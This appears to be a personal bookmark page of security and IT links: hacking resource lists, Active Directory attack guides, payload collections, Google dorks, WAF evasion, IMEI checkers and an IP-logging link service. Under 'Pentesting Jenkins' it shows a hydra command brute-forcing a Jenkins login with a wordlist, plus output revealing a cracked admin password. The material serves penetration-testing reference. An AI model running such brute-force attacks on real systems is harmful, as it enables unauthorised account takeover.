Handy Links
M365Maps - Microsoft 365 Licensing
The Book of Secret Knowledge
A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools, and more.
Github.com - The Book of Secret Knowledge
Awesome hackings
A curated list of awesome Hacking. Inspired by awesome-machine-learning
If you want to contribute to this list (please do), send me a pull request or contact me @carpedm20
For a list of free hacking books available for download, go here
IMEI / iCloud Lock Checking
iFreeiCloud.co.uk - Checks Model, Capacity, Colour, Find My iPhone Status, Replaced Status, Activation Status, Service Coverage, Technical Support, Warranty Plan, Warranty Expiry & Loaner Status for Apple devices. You can also check non-Apple devices to find the Model & Manufacturer. Tool to check details of iDevices (iPhone, iPad) for iCloud lock / find my iPhone.
ImeiCheck.com - offers a variety of IMEI Check Services providing all the information about your device, fast and accessible!
MITRE framework
AzureAD Enumeration
Azure Active Directory - Rootsecdev
OSCP Repo
This is a list of resources and scripts that I have been gathering (and continuing to gather) in preparation for OSCP.
itm4n Documentation page
Blog of offensive security consultant.
Wallpapers
Ebooks
Active directory exploitation and interesting items
Infosecmatters.com - Top 16 Active Directory vulnerabilities
Active Directory Security
Pentesting tools
PayloadAllTheThings
Github.com - PayloadAllTheThings
Internet speedtest
Information Security References
Fake name generator
Expired domains
Search for domains that are about to expire or are already expired.
Responsible disclosure
Spamfilter blacklist checking
Iconic — Free “do wtf you want with” pixel-perfect icons
GHDB - Google Hacking Database
Exploit-db.com - Google Hacking Database
Attacking Active Directory: 0 to 0.9
zer1t0.gitlab.io - Attacking Active Directory: 0 to 0.9
Pentesting Jenkins
$ hydra 127.0.0.1 -s 8080 -V -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -l admin -P /usr/share/wordlists/rockyou.txt
[...]
[ATTEMPT] target 127.0.0.1 - login "admin" - pass "hottie1" - 556 of 14344399 [child 8] (0/0)
[8080][http-post-form] host: 127.0.0.1 login: admin password: spongebob
[STATUS] attack finished for 127.0.0.1 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-22 15:04:47Application Security overview and mitigation list
Applicationsecurity.io - Appsec Findings database list
Web Application Firewall (WAF) Evasion Techniques #3
Secjuice.com - Web Application Firewall (WAF) Evasion Techniques
An A-Z Index of Windows CMD commands
An A-Z Index of Windows CMD commands.
Pentesting Web checklist
Grabify IP LOGGER
Create an URL that will log the IP of visitor(s).
Microsoft Portals Overview
Microsoft has a lot of portals.
After not remembering all the Microsoft Portal URLs so many times, Adam decided to make a list and with a help from a few others, have gotten to this stage. You can read more about the details on the About page.
msportals.io - Microsoft Administrator Sites Github.com - msportals.io - Microsoft Portals
List of Github repositories and articles with list of dorks for different search engines
Github.com - Dorks collections list